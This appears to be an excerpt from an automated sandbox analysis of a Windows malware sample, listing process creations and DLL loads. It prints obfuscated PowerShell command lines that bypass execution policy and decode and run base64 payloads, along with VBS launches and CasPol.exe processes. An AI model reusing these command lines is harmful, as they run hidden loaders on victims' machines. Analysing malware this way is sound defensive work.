                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESF4EA.tmp" "c:\Users\user\AppData\Local\Temp\tc3erle0\CSCE42B52D3958749FFBAC69A71E4122F1.TMP"
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\weneedkissingwellongirlfriendshebeautif.vbS"
                  Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $biscato = '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';$desalinhadamente = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($biscato));Invoke-Expression $desalinhadamente
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe"
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe /stext "C:\Users\user\AppData\Local\Temp\tozq"
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe /stext "C:\Users\user\AppData\Local\Temp\wieivps"
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe /stext "C:\Users\user\AppData\Local\Temp\gcjtvhddyq"
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe"
                  Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" "/C POwerSHEll.EXe -EX BypasS -NOp -w 1 -c DEViCecredEnTiAldEPloyMEnT ; INVokE-EXpreSsIOn($(INvoke-exPressIOn('[SYStEM.tEXT.eNCoDINg]'+[CHAr]0X3A+[ChAr]0x3a+'UtF8.GeTSTRing([SYsteM.CONveRT]'+[CHaR]0X3A+[cHar]58+'FrOmbaSe64sTrIng('+[cHar]34+'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'+[ChaR]34+'))')))"
                  Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe POwerSHEll.EXe -EX BypasS -NOp -w 1 -c DEViCecredEnTiAldEPloyMEnT ; INVokE-EXpreSsIOn($(INvoke-exPressIOn('[SYStEM.tEXT.eNCoDINg]'+[CHAr]0X3A+[ChAr]0x3a+'UtF8.GeTSTRing([SYsteM.CONveRT]'+[CHaR]0X3A+[cHar]58+'FrOmbaSe64sTrIng('+[cHar]34+'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'+[ChaR]34+'))')))"
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\sietgs52\sietgs52.cmdline"
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\weneedkissingwellongirlfriendshebeautif.vbS"
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESBBA2.tmp" "c:\Users\user\AppData\Local\Temp\sietgs52\CSC6D12096A8D2545939E28F0D748EE93EA.TMP"
                  Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $biscato = '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';$desalinhadamente = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($biscato));Invoke-Expression $desalinhadamente
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe"
                  Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" "/C POwerSHEll.EXe -EX BypasS -NOp -w 1 -c DEViCecredEnTiAldEPloyMEnT ; INVokE-EXpreSsIOn($(INvoke-exPressIOn('[SYStEM.tEXT.eNCoDINg]'+[CHAr]0X3A+[ChAr]0x3a+'UtF8.GeTSTRing([SYsteM.CONveRT]'+[CHaR]0X3A+[cHar]58+'FrOmbaSe64sTrIng('+[cHar]34+'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'+[ChaR]34+'))')))"
                  Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe POwerSHEll.EXe -EX BypasS -NOp -w 1 -c DEViCecredEnTiAldEPloyMEnT ; INVokE-EXpreSsIOn($(INvoke-exPressIOn('[SYStEM.tEXT.eNCoDINg]'+[CHAr]0X3A+[ChAr]0x3a+'UtF8.GeTSTRing([SYsteM.CONveRT]'+[CHaR]0X3A+[cHar]58+'FrOmbaSe64sTrIng('+[cHar]34+'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'+[ChaR]34+'))')))"
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\tc3erle0\tc3erle0.cmdline"
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\weneedkissingwellongirlfriendshebeautif.vbS"
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESF4EA.tmp" "c:\Users\user\AppData\Local\Temp\tc3erle0\CSCE42B52D3958749FFBAC69A71E4122F1.TMP"
                  Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $biscato = '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';$desalinhadamente = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($biscato));Invoke-Expression $desalinhadamente
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe"
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe /stext "C:\Users\user\AppData\Local\Temp\tozq"
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe /stext "C:\Users\user\AppData\Local\Temp\wieivps"
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe /stext "C:\Users\user\AppData\Local\Temp\gcjtvhddyq"
                  Source: C:\Windows\System32\mshta.exe Section loaded: version.dll
                  Source: C:\Windows\System32\mshta.exe Section loaded: dwmapi.dll
                  Source: C:\Windows\System32\mshta.exe Section loaded: cryptsp.dll
                  Source: C:\Windows\System32\mshta.exe Section loaded: rpcrtremote.dll
                  Source: C:\Windows\System32\mshta.exe Section loaded: secur32.dll
                  Source: C:\Windows\System32\mshta.exe Section loaded: winhttp.dll
                  Source: C:\Windows\System32\mshta.exe Section loaded: webio.dll
                  Source: C:\Windows\System32\mshta.exe Section loaded: iphlpapi.dll
                  Source: C:\Windows\System32\mshta.exe Section loaded: winnsi.dll
                  Source: C:\Windows\System32\mshta.exe Section loaded: dnsapi.dll
                  Source: C:\Windows\System32\mshta.exe Section loaded: dhcpcsvc6.dll
                  Source: C:\Windows\System32\mshta.exe Section loaded: dhcpcsvc.dll
                  Source: C:\Windows\System32\mshta.exe Section loaded: nlaapi.dll
                  Source: C:\Windows\System32\mshta.exe Section loaded: rasadhlp.dll
                  Source: C:\Windows\System32\mshta.exe Section loaded: oleacc.dll
                  Source: C:\Windows\System32\mshta.exe Section loaded: sxs.dll
                  Source: C:\Windows\System32\mshta.exe Section loaded: credssp.dll
                  Source: C:\Windows\System32\mshta.exe Section loaded: ncrypt.dll
                  Source: C:\Windows\System32\mshta.exe Section loaded: bcrypt.dll
                  Source: C:\Windows\System32\mshta.exe Section loaded: gpapi.dll
                  Source: C:\Windows\System32\mshta.exe Section loaded: mpr.dll
                  Source: C:\Windows\System32\mshta.exe Section loaded: scrrun.dll
                  Source: C:\Windows\System32\mshta.exe Section loaded: propsys.dll
                  Source: C:\Windows\System32\mshta.exe Section loaded: ntmarta.dll
                  Source: C:\Windows\System32\mshta.exe Section loaded: msls31.dll
                  Source: C:\Windows\System32\mshta.exe Section loaded: d2d1.dll
                  Source: C:\Windows\System32\mshta.exe Section loaded: dwrite.dll
                  Source: C:\Windows\System32\mshta.exe Section loaded: dxgi.dll
                  Source: C:\Windows\System32\mshta.exe Section loaded: d3d11.dll
                  Source: C:\Windows\System32\mshta.exe Section loaded: d3d10warp.dll
                  Source: C:\Windows\System32\cmd.exe Section loaded: winbrand.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rpcrtremote.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ncrypt.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: bcrypt.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: winhttp.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: webio.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: iphlpapi.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntmarta.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: version.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: mscoree.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: version.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: dwmapi.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: propsys.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: apphelp.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: ntmarta.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: secur32.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rpcrtremote.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcrypt.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: webio.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: credssp.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Windows\System32\mshta.exeSection loaded: version.dllJump to behavior
                  Source: C:\Windows\System32\mshta.exeSection loaded: dwmapi.dllJump to behavior
                  Source: C:\Windows\System32\mshta.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Windows\System32\mshta.exeSection loaded: rpcrtremote.dllJump to behavior
                  Source: C:\Windows\System32\mshta.exeSection loaded: secur32.dllJump to behavior
                  Source: C:\Windows\System32\mshta.exeSection loaded: winhttp.dllJump to behavior
                  Source: C:\Windows\System32\mshta.exeSection loaded: webio.dllJump to behavior
                  Source: C:\Windows\System32\mshta.exeSection loaded: iphlpapi.dllJump to behavior
                  Source: C:\Windows\System32\mshta.exeSection loaded: winnsi.dllJump to behavior
                  Source: C:\Windows\System32\mshta.exeSection loaded: dnsapi.dllJump to behavior
                  Source: C:\Windows\System32\mshta.exeSection loaded: nlaapi.dllJump to behavior
                  Source: C:\Windows\System32\mshta.exeSection loaded: dhcpcsvc6.dllJump to behavior
                  Source: C:\Windows\System32\mshta.exeSection loaded: dhcpcsvc.dllJump to behavior
                  Source: C:\Windows\System32\mshta.exeSection loaded: oleacc.dllJump to behavior
                  Source: C:\Windows\System32\mshta.exeSection loaded: sxs.dllJump to behavior
                  Source: C:\Windows\System32\mshta.exeSection loaded: rasadhlp.dllJump to behavior
                  Source: C:\Windows\System32\mshta.exeSection loaded: credssp.dllJump to behavior
                  Source: C:\Windows\System32\mshta.exeSection loaded: ncrypt.dllJump to behavior
                  Source: C:\Windows\System32\mshta.exeSection loaded: bcrypt.dllJump to behavior
                  Source: C:\Windows\System32\mshta.exeSection loaded: gpapi.dllJump to behavior
                  Source: C:\Windows\System32\mshta.exeSection loaded: mpr.dllJump to behavior
                  Source: C:\Windows\System32\mshta.exeSection loaded: scrrun.dllJump to behavior
                  Source: C:\Windows\System32\mshta.exeSection loaded: propsys.dllJump to behavior
                  Source: C:\Windows\System32\mshta.exeSection loaded: ntmarta.dllJump to behavior
                  Source: C:\Windows\System32\mshta.exeSection loaded: msls31.dllJump to behavior
                  Source: C:\Windows\System32\mshta.exeSection loaded: d2d1.dllJump to behavior
                  Source: C:\Windows\System32\mshta.exeSection loaded: dwrite.dllJump to behavior
                  Source: C:\Windows\System32\mshta.exeSection loaded: dxgi.dllJump to behavior
                  Source: C:\Windows\System32\mshta.exeSection loaded: d3d11.dllJump to behavior
                  Source: C:\Windows\System32\mshta.exeSection loaded: d3d10warp.dllJump to behavior
                  Source: C:\Windows\System32\cmd.exeSection loaded: winbrand.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rpcrtremote.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: webio.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntmarta.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcrypt.dll
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: vcruntime140_clr0400.dll
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: ucrtbase_clr0400.dll
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: version.dll
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: mscoree.dll
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: cryptsp.dll
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: vcruntime140_clr0400.dll
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: ucrtbase_clr0400.dll
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: cryptsp.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: version.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: dwmapi.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: propsys.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: apphelp.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: ntmarta.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: secur32.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rpcrtremote.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcrypt.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: webio.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: credssp.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: wow64win.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: wow64cpu.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: winmm.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: version.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: shcore.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: iphlpapi.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: winnsi.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: dnsapi.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: dhcpcsvc6.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: dhcpcsvc.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: rasadhlp.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: cryptsp.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: secur32.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: winhttp.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: webio.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: nlaapi.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: rpcrtremote.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: wow64win.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: wow64cpu.dll
